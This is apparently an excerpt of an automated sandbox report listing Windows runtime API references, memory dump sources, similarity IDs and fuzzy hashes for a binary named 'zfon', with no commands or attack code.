                                                                                                APIs
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$memset
                                                                                                • String ID:
                                                                                                • API String ID: 3154343008-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xtime_diff_to_millis2xtime_get$Mtx_reset_owner
                                                                                                • String ID:
                                                                                                • API String ID: 638720424-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F9707965), ref: 00007FF7F9709169
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F9707965), ref: 00007FF7F970917E
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F9707965), ref: 00007FF7F970918E
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F9707965), ref: 00007FF7F970919E
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F9707965), ref: 00007FF7F97091AB
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                APIs
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                • String ID:
                                                                                                • API String ID: 3063020102-0
                                                                                                APIs
                                                                                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F96FE241
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96FE26A
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96FE27A
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96FE28A
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96FE297
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$strtoul
                                                                                                • String ID:
                                                                                                • API String ID: 1658144056-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F8CB5
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F8CCE
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F8CDE
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F8CEE
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F8CFB
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F93), ref: 00007FF7F96F9973
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F93), ref: 00007FF7F96F998F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F93), ref: 00007FF7F96F999F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F93), ref: 00007FF7F96F99AF
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F93), ref: 00007FF7F96F99BC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F971DE03
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F971DE1F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F971DE2F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F971DE3F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F971DE4C
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F972C0B3
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F972C0CF
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F972C0DF
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F972C0EF
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F972C0FC
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F13), ref: 00007FF7F96F98F3
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F13), ref: 00007FF7F96F990F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F13), ref: 00007FF7F96F991F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F13), ref: 00007FF7F96F992F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F96F8F13), ref: 00007FF7F96F993C
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F9711C43
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F9711C5F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F9711C6F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F9711C7F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F9711C8C
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F9727A8D), ref: 00007FF7F9727C63
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F9727A8D), ref: 00007FF7F9727C7F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F9727A8D), ref: 00007FF7F9727C8F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F9727A8D), ref: 00007FF7F9727C9F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF7F9727A8D), ref: 00007FF7F9727CAC
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E4403
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E441B
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E442B
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E443B
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E4448
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA623
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA63F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA64F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA65F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA66C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: fc2c3111614c86b3978751517b6eb494c7d1032bfecd94e764b9329ffff241ad
                                                                                                • Instruction ID: ef600839b447c5865f05d943d7509bd0f69b9d3b80274f900f8e5cd528c8697d
                                                                                                • Opcode Fuzzy Hash: fc2c3111614c86b3978751517b6eb494c7d1032bfecd94e764b9329ffff241ad
                                                                                                • Instruction Fuzzy Hash: 39F04FA0E0820769EB8CBF54BD4C338A2769F097F2F804A34C13D02AECDD5D258586B6
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F97215A3
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F97215BC
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F97215CC
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F97215DC
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F97215E9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: 3f681eb5713a892da424ea5b97dc0341e4c877ef2987a9e861528f4583824885
                                                                                                • Instruction ID: 6ff8cf6f6da102270e7ed7056c887cb6adc56ecf765ddc061d22e3eaa7ec2853
                                                                                                • Opcode Fuzzy Hash: 3f681eb5713a892da424ea5b97dc0341e4c877ef2987a9e861528f4583824885
                                                                                                • Instruction Fuzzy Hash: 49F03CE0D1934768EBA8BF56BC4C269A171EF0D7F2F800A34C13E019DC9D5C248646B1
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F97092EA
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F97092FF
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F970930F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F970931F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F970932C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: 7402652a24f6ac2342940f10915b9c3fc5835fbb4437735f00c634805102aa82
                                                                                                • Instruction ID: b5650904114b5f20df202889871b522ac059fb77b13aed1df0b034173f853db1
                                                                                                • Opcode Fuzzy Hash: 7402652a24f6ac2342940f10915b9c3fc5835fbb4437735f00c634805102aa82
                                                                                                • Instruction Fuzzy Hash: CDF0F4A0E08607A8EB8CBF95AC8D238E1629F087F2F804A35C23D029EC9F5C24D545B1
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F970927A
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F970928F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F970929F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F97092AF
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F97092BC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                • Opcode ID: a292d89722aa7e017496ccada6b4d01e5cbe7845519cfa99e775e957023e2368
                                                                                                • Instruction ID: 1fda38239280ca6e0c49543cd9b73ac405fabfc23eb2fdb814b7073e3658e6af
                                                                                                • Opcode Fuzzy Hash: a292d89722aa7e017496ccada6b4d01e5cbe7845519cfa99e775e957023e2368
                                                                                                • Instruction Fuzzy Hash: 4EF0F4A0E0860765EB8CBF95AC4C268B1629F0D7F2F904A35C23D019EC8E5C249641B1
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xlength_error@std@@$cef_string_map_alloc
                                                                                                • String ID: vector<T> too long
                                                                                                • API String ID: 1597692744-3788999226
                                                                                                • Opcode ID: 1b4c66c2c6d364308aa5f1dc8f150ffe184bf7a47c220a6ef14ea198b7739db5
                                                                                                • Instruction ID: 4b5a1369870e7a3f92a2e1e0c552c1ca1bcd0dd547664205a02902215fd10708
                                                                                                • Opcode Fuzzy Hash: 1b4c66c2c6d364308aa5f1dc8f150ffe184bf7a47c220a6ef14ea198b7739db5
                                                                                                • Instruction Fuzzy Hash: 85D17B62B04B8585EF14EF65C8902ACA3B2EF94B98788C532CF1E177A8DF39D545C394
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8BFB56E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB529EE), ref: 00007FF8BFB56E56
                                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB5488B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort
                                                                                                • String ID: $csm$csm
                                                                                                • API String ID: 4206212132-1512788406
                                                                                                • Opcode ID: bbeebd1b8dc6bb018cbb3e2007e3860d9f81b2d26c669440cff39126283f8657
                                                                                                • Instruction ID: 73989429bf1ab5b009e9834cbee2e3c25919ce398797fafda79e7c689d736f25
                                                                                                • Opcode Fuzzy Hash: bbeebd1b8dc6bb018cbb3e2007e3860d9f81b2d26c669440cff39126283f8657
                                                                                                • Instruction Fuzzy Hash: 1471BE32908681CADB698FA9D4B177DBBA0FB41BC8F088135DB8D07A89CB3CE451C740
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8BFB56E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BFB529EE), ref: 00007FF8BFB56E56
                                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BFB545DB
                                                                                                • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF8BFB545EB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                                                                • String ID: csm$csm
                                                                                                • API String ID: 4108983575-3733052814
                                                                                                • Opcode ID: 73f04ae2f99dd10f8d311029635b97aaf7a618db7278283a49f5dcc94daca835
                                                                                                • Instruction ID: 649264b81e9e86f7715395e935e5787e92d04e273c4496495c120781862dd5d1
                                                                                                • Opcode Fuzzy Hash: 73f04ae2f99dd10f8d311029635b97aaf7a618db7278283a49f5dcc94daca835
                                                                                                • Instruction Fuzzy Hash: 67518D72908282C6EB688FA9A57536977A0FB54BD8F144136DB8D47B95CF3CF4A1CB00
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$CreateFrameInfo__except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 444109036-1018135373
                                                                                                • Opcode ID: 1e96529f35874369624db110d262335690731295dc4eb4a79234829db8fb8cf6
                                                                                                • Instruction ID: 24b0a8b521ffcb295438d4cb54921eb551aa70d80cd25e0b804ead7f76c49737
                                                                                                • Opcode Fuzzy Hash: 1e96529f35874369624db110d262335690731295dc4eb4a79234829db8fb8cf6
                                                                                                • Instruction Fuzzy Hash: 07513B7A61878197E634AB59E44226D77E4FB89BD8F106134EB8D07B95CF3CE461CB00
                                                                                                APIs
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90ED5CD), ref: 00007FF8B90E9F14
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF8B90ED5CD), ref: 00007FF8B90E9F52
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90ED5CD), ref: 00007FF8B90E9F5C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID: ios_base::failbit set
                                                                                                • API String ID: 2665656946-3924258884
                                                                                                • Opcode ID: 372e2b47e2d3b0d854694287b5f130fe644ee4ade947c284ca8dfcb215dcd649
                                                                                                • Instruction ID: 77d569f3df32e7e1cf953a4af9b9f11e352ddc2f645d269b08b37ff13017a50a
                                                                                                • Opcode Fuzzy Hash: 372e2b47e2d3b0d854694287b5f130fe644ee4ade947c284ca8dfcb215dcd649
                                                                                                • Instruction Fuzzy Hash: B631BF22B09BC191EE14DF2E964426C73A6EB05BE0F584631DB7E07BD6EE7CE0528304
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameName::
                                                                                                • String ID: %lf
                                                                                                • API String ID: 1333004437-2891890143
                                                                                                • Opcode ID: 659bed4bb908e209d6e638fb5e771b3dbb5b7a5e94ab5cc6538d6df8f816cc28
                                                                                                • Instruction ID: d04e194e0ce013320e9b51e27e178798a32c873c339750474385b2399ca8ac07
                                                                                                • Opcode Fuzzy Hash: 659bed4bb908e209d6e638fb5e771b3dbb5b7a5e94ab5cc6538d6df8f816cc28
                                                                                                • Instruction Fuzzy Hash: AB31C561A08B8695EA10DFAAA8601BAB760FF56BC0F548236EB8E57755DF3CF101C740
                                                                                                APIs
                                                                                                • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F5DA0
                                                                                                • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F5DB2
                                                                                                • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F5E3B
                                                                                                  • Part of subcall function 00007FF8B90EB690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6B2
                                                                                                  • Part of subcall function 00007FF8B90EB690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6D8
                                                                                                  • Part of subcall function 00007FF8B90EB690: memcpy.VCRUNTIME140(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6F0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: setlocale$freemallocmemcpy
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 1663771476-1405518554
                                                                                                • Opcode ID: ed4f7dfe5a515434e25b2c0ad389f85bfba29932e5edace8a2c72acfa9ea8547
                                                                                                • Instruction ID: 8f8d7b2db11f1d17ddf068099a507eff39654d807f91d19a04408d93e5681451
                                                                                                • Opcode Fuzzy Hash: ed4f7dfe5a515434e25b2c0ad389f85bfba29932e5edace8a2c72acfa9ea8547
                                                                                                • Instruction Fuzzy Hash: F731D622F1D6C296FE659F1EA4441BAA7A19F84BC0F488035DB4E47B55DE3CE9828340
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID: ContentSizeUpdate$scene
                                                                                                • API String ID: 3041573648-1460969042
                                                                                                • Opcode ID: f86edb876135eaae2020f8e938f6b9446a33d57ee3d659bcacc85f9186bf0c32
                                                                                                • Instruction ID: ac1445f280971c06f4215329918e307ade72c0bd7281e1852ac72f681cdfe69f
                                                                                                • Opcode Fuzzy Hash: f86edb876135eaae2020f8e938f6b9446a33d57ee3d659bcacc85f9186bf0c32
                                                                                                • Instruction Fuzzy Hash: D4319F62609A8581EB20EF18E880269E7B1FFC5BD4F949131E6AD47AE9EF2CC445C750
                                                                                                APIs
                                                                                                Strings
